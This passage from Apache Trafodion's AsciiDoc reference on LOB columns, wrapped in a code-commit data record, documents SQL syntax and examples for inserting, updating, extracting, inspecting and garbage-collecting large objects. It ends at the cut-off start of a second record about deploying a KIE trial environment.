\r\n```\r\n\r\n[#semantics]\r\n=== semantics\r\n\r\n* `_target-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the target table in which to insert values. \r\n\r\n+\r\nThe data type of each target column must be compatible with the data type of its corresponding source value. \r\n\r\n+\r\nWithin the list, each target column must have the same position as its associated source value.\r\n\r\n** `_target-colname_` \r\n+\r\nis a SQL identifier that specifies a target column name.\r\n\r\n* `_source-col-list-expr_`\r\n+\r\nnames a single column or multiple columns enclosed in parentheses in the source table from which to get values. \r\n\r\n** `_source-colname_` \r\n+\r\nis a SQL identifier that specifies a source column name.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen inserting from a source Trafodion table column into a target table, the source column subtype of the LOB column needs to match the target table column. That is, you cannot insert from an external LOB column into a regular LOB column in the target. They both need to be the same type. \r\n\r\nThe source for the *select clause* can be any of the following: \r\n\r\n* A source hive table column that is a hive varchar column\r\n* A source table column that is a Trafodion varchar, char and LOB column\r\n* A source table column that is also a LOB datatype.\r\n\r\n[#examples]\r\n=== Examples \r\n* This example inserts the first 10 rows of d_date_sk and d_date_id selected from the source hive table hive.hive.date_dim into the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2 SELECT [first 10] d_date_sk,d_date_id FROM hive.hive.date_dim;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130var into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130var;\r\n```\r\n\r\n* This example inserts the c1 and c2 selected from the source Trafodion table t130char into the c1 and c2 of the target table t130lob2.\r\n+\r\n```\r\nINSERT INTO t130lob2(c1,c2) SELECT c1,c2 FROM t130char;\r\n```\r\n\r\n* This example inserts the c1, c2 and c3 selected from the source Trafodion table t130lob2 into the target table t130lob3, and then shows the result.\r\n+\r\n```\r\nINSERT INTO t130lob3 SELECT c1,c2,c3 FROM t130lob2;\r\nSELECT c1,lobtostring(c2,100),lobtostring(c3,100) FROM t130lob3;\r\n```\r\n\r\n[#updating a sql table containing lob columns]\r\n== Updating a SQL Table Containing LOB Columns\r\n\r\nThe source for updating a LOB can be divided into 2 groups:\r\n\r\n* Update using parameters\/functions\r\n* Update using LOB handle\r\n\r\n[#updating using parameters\/functions]\r\n=== Updating Using Parameters\/Functions\r\n\r\nThe following parameters\/functions can be used to update.\r\n\r\n* A parameter\r\n* `EMPTY_BLOB` or `EMPTY_CLOB`\r\n* An in-memory lob which is a simple string data \r\n+\r\nTo insert this string, a literal needs to be provided\r\n* An on-platform file (linux\/hdfs file) containing text or binary data \r\n* A user buffer of a specified length allocated in user space\r\n* An external LOB file in HDFS\r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE table-name {set-clause-type1 | set-clause-type2} \r\n```\r\n\r\n```\r\nset-clause-type1 is: \r\nSET set-clause[, set-clause ].. \r\n\r\nset-clause is: \t\r\nlob_column-name = {lob_query-expr} \r\n\r\nlob_query-expr is:\r\nNULL | ? |\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression'[, APPEND]) |\r\nFILETOLOB('lob source file name'[, APPEND]) |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value[, APPEND]) |\r\nEXTERNALTOLOB('external lob source file name'[, APPEND])\r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\nFor more information, see Semantics in <<inserting into a sql table containing lob columns,Inserting into a SQL Table Containing LOB Columns>>.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* In the table tlob1where c1 is 3, updates (appends) the value of c2 to lob_update.txt.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to anoush.jpg.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('anoush.jpg');\r\n```\r\n\r\n* In the table tlob1 where c1 is 3, updates (appends) the value of c2 to lob_update.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=filetolob('hdfs:\/\/\/lobs\/lob_update.txt', append) WHERE c1 = 3;\r\n```\r\n\r\n* In the table tlob1, updates (overwrites) the value of c2 to the buffer location at 1254674 with 4000-byte length.\r\n+\r\n```\r\nUPDATE tlob1 SET c2=buffertolob(LOCATION 12546474, SIZE 4000);\r\n```\r\n\r\n* In the table tlob130ext where c1 is 2, updates (overwrites) the value of c4 to lob_input_d1.txt stored in hdfs:\/\/\/lobs\/.\r\n+\r\n```\r\nUPDATE tlob130ext SET c4=externaltolob('hdfs:\/\/\/lobs\/lob_input_d1.txt') WHERE c1=2;\r\n```\r\n\r\n* In the table t130lob2 where c1 is 1, updates (overwrites) value of the c2 to xyxyxyxyxyxyx.\r\n+\r\n```\r\nPREPARE S FROM UPDATE t130lob2 SET c2=? WHERE c1 =1;\r\nEXECUTE S USING 'xyxyxyxyxyxyx';\r\n```\r\n\r\n[# updating using lob handle]\r\n=== Updating Using Lob Handle\r\n\r\nA LOB handle is specified to the update (similar to extract). \r\n\r\n[#syntax]\r\n==== Syntax \r\n\r\n```\r\nUPDATE LOB (LOB 'lob handle', lob update expression)\r\n```\r\n\r\n```\r\nlob update expression is: \r\nLOCATION lob source buffer address, LENGTH lob length value [, APPEND]) | \r\nEMPTY_BLOB() | \r\nEMPTY_CLOB()\r\n```\r\n\r\nFor more information about examples, see http:\/\/trafodion.incubator.apache.org\/docs\/jdbct4ref_guide\/index.html[*Trafodion JDBC Type 4 Programmer\u2019s Reference Guide*].\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* The keyword `APPEND` can be used to append to lob data that may already exist in a LOB column. If it is not specified, the data is overwritten.\r\n\r\n* When a LOB column is updated or overwritten, a new section is written into the LOB data file. The old section remains in HDFS but won\u2019t have any pointer or reference to it.\r\n\r\n* When a LOB column is appended, a new chunk is inserted into HDFS and a new row is added in the LOB Descriptor Chunks table to keep track of this new chunk, belonging to the existing row\/LOB data. \r\n\r\n+\r\nSo a LOB column that contains data that has been appended several times can contain multiple descriptor rows in the Descriptor Chunks table to describe where each chunk belonging to this LOB begins\/ends.\r\n\r\n* `APPEND` cannot be used on function `EXTERNALTOLOB`.\r\n\r\n* When an external LOB is updated outside of Trafodion, an update needs to be done to update the descriptor files in Trafodion. \r\n+\r\nFor example, if the external file changes in size, the descriptor file needs to be updated to reflect that. Since this is outside the control of Trafodion, the user needs to do this. If not, when extracting data, only partial data may be returned. \r\n\r\n* If a column is declared with the `STORAGE 'External'` attribute, the `STRINGTOLOB` or `FILETOLOB` functions cannot be used to insert data into that column. \r\n+\r\nSimilarly, if a column is declared without the `STORAGE 'External'` attribute, the `EXTERNALTOLOB` function cannot be used to insert\/update data into that column.\r\n+\r\nThat is, once the storage for a LOB column is declared at CREATE time, the attribute is set and cannot be modified. \r\n\r\n[#selecting column from a sql table containing lob columns]\r\n== Selecting Column from a SQL Table Containing LOB Columns\r\n\r\nSelecting a row from a table will give back the lob handle for the lob column. \r\n\r\nNOTE: The entry in each lob column in the SQL table only contains the LOB handle.\r\n\r\nOnce the LOB handle has been retrieved, it can be used to retrieve the actual lob data from HDFS.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSELECT lob_query-expr[, lob_query-expr] FROM table-name\r\n```\r\n\r\n```\r\nlob_query_expr is: \r\nlobtostring(lob column) |\r\nlob column\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example selects c2 from table tlob1 and returns the lob handle of c2.\r\n+\r\n```\r\nSELECT c2 FROM tlob1;\r\nC2\r\n----------------------------------------------------------------------------------------------------\r\n\r\nLOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\" \r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n[#extracting lob data from a sql table containing lob columns]\r\n== Extracting LOB Data from a SQL Table Containing LOB Columns \r\n\r\nExtract lob data can be done in two ways:\r\n\r\n* Extract lob data into a file for a given lob handle\r\n+\r\nExtract from a LOB column straight into an on-platform linux or HDFS file in one shot. \r\n\r\n+\r\nTrafodion engine will take care of buffering the data and retrieve the lob data into the target file.\r\n\r\n* Extract lob data into a user specified buffer\r\n+\r\nExtract from a LOB column into a target user buffer of a specified size. \r\n+\r\nTrafodion engine will retrieve exactly the amount of requested data. \r\n+\r\nThe user\/application will be responsible for redriving the extract until end of data. \r\n+\r\nThe extracted buffer data can then be written to files or another location as the application chooses. \r\n\r\n[#extracting lob data into a file for a given lob handle]\r\n=== Extracting Lob Data into a File for a Given Lob Handle \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOFILE (LOB 'lob handle as quoted string', 'filename URI format' [OPTION]) \r\n```\r\n\r\n```\r\nOPTION is: \r\n[, TRUNCATE]\r\n[, CREATE, TRUNCATE]\r\n[, APPEND] \r\n[, CREATE, APPEND]\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it.\r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, TRUNCATE`\r\n+\r\nIf the target file exists, Trafodion will truncate and write to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and write to it.\r\n\r\n* `APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, an error will be raised.\r\n\r\n* `CREATE, APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and append to it. \r\n\r\n[#considerations]\r\n==== Considerations\r\n\r\nIf the target file exists, the `OPTION` must be specified, or else an error will be raised. This is the default behavior.\r\n\r\nIf the target file does not exist, you can create a target file by specifying the `OPTION`. \r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts LOB to the tlob130_txt1.txt:\r\n\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583625519884121437206093184618212317486018305654020\"TRAFODION\".\"LOB130\"', 'tlob130_txt1.txt');\r\nSuccess. Targetfile:tlob130_txt1.txt Length: 19\r\n```\r\n\r\n* This example extracts LOB to the tlob130_deep.jpg:\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583681719884121437210516812518212317486062586654020\"TRAFODION\".\"LOB130\"', \r\nSuccess. Targetfile:tlob130_deep.jpg Length: 159018\r\n```\r\n\r\n[#extracting lob data into a user specified buffer]\r\n=== Extracting Lob Data into a User Specified Buffer\r\n\r\nExtract from a LOB column into a target user buffer of a specified size. The Trafodion engine will retrieve exactly the amount of requested data. The user\/application will be responsible for redriving the extract until end of data. Then the extracted buffer data can be written to files or another location as the application chooses. \r\n\r\nExtract LOB data into a user specified buffer like a cursor until EOD is returned. For this method, the user specifies an input buffer and specifies the input length in an in\/out variable. \r\n\r\nFor each execution of the extract, Trafodion will return SUCCESS, ERROR or EOD. \r\nFor the cases of SUCCESS or EOD, a length will also be returned to the user, so the user knows exactly how much data was actually extracted and returned. \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOBUFFER (LOB 'lob handle as quoted string', LOCATION lob output buffer address as long, SIZE input\/output address of length container as long)\r\n```\r\n\r\n[#extracting lob length for a given lob handle]\r\n=== Extracting Lob Length for a Given Lob Handle\r\n\r\nExtract from a LOB column straight into an on-platform linux or HDFS file in one shot. \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBLENGTH (LOB 'lob handle as quoted string'[, LOCATION address of length container for lob length])\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `_LOCATION address of length container for lob length_`\r\n\r\n+\r\nThis is used by programs\/applications that will use this syntax to retrieve the LOB length prior to extracting data. The address should be an address of a 64-bit container that will hold the LOB length. \r\n+\r\nIf the length is omitted or 0, only the status message is returned that displays the length.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts LOB length and returns 30.\r\n\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH0000000800030554121478481170502119554121478546064413218212330526373762019024\"TRAFODION\".\"TESTEXTLOB\"');\r\nLOB Length: 30\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example extracts LOB length and returns 4.\r\n\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\"');\r\nLOB Length: 4\r\n--- SQL operation complete.\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* LOB Max Extract Data Length\r\n+\r\nCQD `LOB_OUTPUT_SIZE` (default 32000) controls the maximum data length that can be extracted.\r\n\r\n* LOB Max Extract Chunk Length\r\n+\r\nCQD `LOB_MAX_CHUNK_MEM_SIZE` (512 MB expressed in bytes [536870912]) controls the maximum chunk of data that can be read from HDFS into memory and written to the target file location. \r\n\r\n* LOB Max Size\r\n+\r\nCQD `LOB_MAX_SIZE` (default 10G expressed in M [10000M]).\r\n\r\n* Extract Target Locations\r\n+\r\nThe file to extract to can be a local linux file or a local HDFS file.\r\n\r\n[#deleting column from a sql table containing lob columns]\r\n== Deleting Column from a SQL Table Containing LOB columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nDELETE lob-column-name FROM table-name [WHERE CLAUSE]\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen one or more rows containing LOB columns are deleted from LOB table, only the metadata information is dropped and the hdfs data remains as it is. The references to the lob data are removed from the lob descriptor file. \r\n\r\nThis mechanism has not been implemented yet as a separate utility but it is triggered as a part of insert, update and append operations. For more information, see <<garbage collection,Garbage Collection>>.\r\n\r\n[#dropping a sql table containing lob columns ]\r\n== Dropping a SQL Table Containing LOB Columns \r\n\r\nDrop works like any other drop table. All dependent tables are deleted. All files in hdfs (data and descriptor) files are also deleted.\r\n\r\nFor more information, see <<drop_table_statement,DROP TABLE Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#garbage collection]\r\n== Garbage Collection\r\n\r\nWhen a lob datafile for a column has reached a certain limit, defined by a CQD `LOB_GC_LIMIT_SIZE`, then a compaction is triggered automatically. +\r\nThe default GC Limit is 10GB and can be changed if needed. \r\n\r\nThe need for GC arises because when a delete operation or an update operation is performed, the old data black in the hdfs file will be left as unused. +\r\nIn the case of update, the old data will be left as unused and the new data will be written into a new section, so all these \u201choles\u201d in the LOB data file are needlessly occupying space. \r\n\r\nThe LOB descriptor chunks file is looked at to see which ranges and offsets are actually used. The LOB datafile is temporarily saved. The compaction is done into a new tempfile. When the sections have all been copied into the tempfile, Trafodion will delete the existing lob data file and rename the tempfile. \r\n\r\nFinally, the saved copy of the LOB datafile is dropped. The saved copy is there just in case you need to fall back to it in case of an error. Since this operation is triggered as part of an IUD operation, a definite slowdown will occur for that insert\/update operation compared to subsequent inserts\/updates. \r\n\r\nAlso, each lob column of a table can be compacted separately as needed. GC does not have to be done to all columns of the LOB table all at once. \r\n\r\nNOTE: Currently the GC is done in the same transaction as the transaction being used for the insert or update operation. If any part of the GC fails, then the entire transaction is aborted. \r\n\r\nWhen Trafodion has support for local transactions, Trafodion will do the GC in a separate transaction or in a separate process, so you can fail the GC with a warning and allow the insert to go through. \r\n\r\nSetting the CQD `LOB_GC_LIMIT_SIZE` to 0 would prevent GC from occurring.\r\n\r\n[#cleanup of a sql table containing lob columns]\r\n== Cleanup of a SQL Table Containing LOB Columns\r\n\r\nCleanup works like cleanup of any other table. The command ensures all dependent SQL LOB tables and hdfs files are dropped ignoring errors if any.\r\n\r\nFor more information, see <<cleanup_statement,CLEANUP Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#showddl for lob]\r\n== SHOWDDL for LOB\r\n\r\nSHOWDDL for LOB with a special option will show all the dependent objects, names and details about the table.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSHOWDDL table-name, LOB DETAILS\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example displays the details of the table t1ob1.\r\n\r\n+\r\n\r\n```\r\n>>SHOWDDL tlob1, LOB DETAILS;\r\nCREATE TABLE TRAFODION.SEABASE.TLOB1\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SEABASE.LOBMD_04239091936503896833\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04239091936503896833_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescHandle_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescChunks_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , INTPARAM LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example displays the details of the table tlob130ext.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', primary key (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SHOWDDL tlob130ext, LOB DETAILS;\r\n\r\nCREATE TABLE TRAFODION.SCH.TLOB130EXT\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , C3 CLOB DEFAULT NULL NOT SERIALIZED\r\n , C4 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SCH.LOBMD__04474425229029907479\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 2\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0002\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 3\r\n\r\nData Storage\r\n============\r\n\r\n<External HDFS location>\r\n<External HDFS file>\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n[#get statement for lob tables]\r\n== Get Statement for LOB Tables\r\n\r\nThe GET Statement for lob tables gives column specific information on any lob columns in a table. \r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nGET LOB STATS FOR TABLE table-name;\r\nSELECT * FROM TABLE(LOB STATS table-name);\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\nSuppose the following tables have been created:\r\n\r\n```\r\n>>CREATE TABLE tlob130gt (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB, PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>CREATE TABLE tlob130gt2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This Get Statement displays statistics for the table tlob130gt, the lob information is formatted for machine readability.\r\n\r\n+\r\n\r\n```\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name) , 20), left(trim(column_name),5), left(trim(lob_location),5) , left(trim(lob_data_file),20),LOB_DATA_FILE_SIZE_EOD,LOB_DATA_FILE_SIZE_USED from table(lob stats(tlob130gt));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C4 \/user\/trafodion\/lobs LOBP_044744252290302 45 30\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n\r\n* This Get Statement displays statistics for the table tlob130gt2, the lob information is formatted for human readability.\r\n\r\n+\r\n\r\n```\r\n>>GET LOB STATS FOR TABLE tlob130gt2;\r\n\r\nLob Information for table: \"TRAFODION\".LOB130.TLOB130GT2\r\n=========================\r\n\r\nColumnName: C2\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0001\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\nColumnName: C3\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0002\r\nLOB EOD: 0\r\nLOB UsedLen: 0\r\nColumnName: C4\r\nLob Location: External HDFS Location\r\nLOB Data File: External HDFS File\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This Get Statement displays statistics for the table tlob130gt2, the lob information is formatted for machine readability.\r\n\r\n+\r\n\r\n```\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name), 20), left(trim(column_name),5), left(trim(lob_location),15), left(trim(lob_data_file),20),LOB_DATA_FILE_SIZE_EOD,LOB_DATA_FILE_SIZE_USED from table(lob stats(tlob130gt2));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290300\u00a0 0 0\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290300 0 0\r\nTRAFODION.SCH.TLOB13 C4 External HDFS Location\u00a0External HDFS File 0 0\r\n\r\n--- 3 row(s) selected.\r\n```","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b41fdc13e96d2b32da8883bb9313d5485151f7e3","subject":"CORS text (#24) (#1219)","message":"CORS text (#24) (#1219)\n\n* first draft CORS text\r\n\r\n* peer review","repos":"manstis\/kie-docs,jomarko\/kie-docs,manstis\/kie-docs,michelehaglund\/kie-docs,jomarko\/kie-docs,michelehaglund\/kie-docs","old_file":"doc-content\/enterprise-only\/openshift\/environment-trial-proc.adoc","new_file":"doc-content\/enterprise-only\/openshift\/environment-trial-proc.adoc","new_contents":"[id='environment-trial-proc']\n= Deploying a trial environment\n\nYou can deploy a trial (evaluation) {PRODUCT} environment. It consists of {CENTRAL} for authoring or managing services and {KIE_SERVER} for test execution of services. \n\nThis environment does not 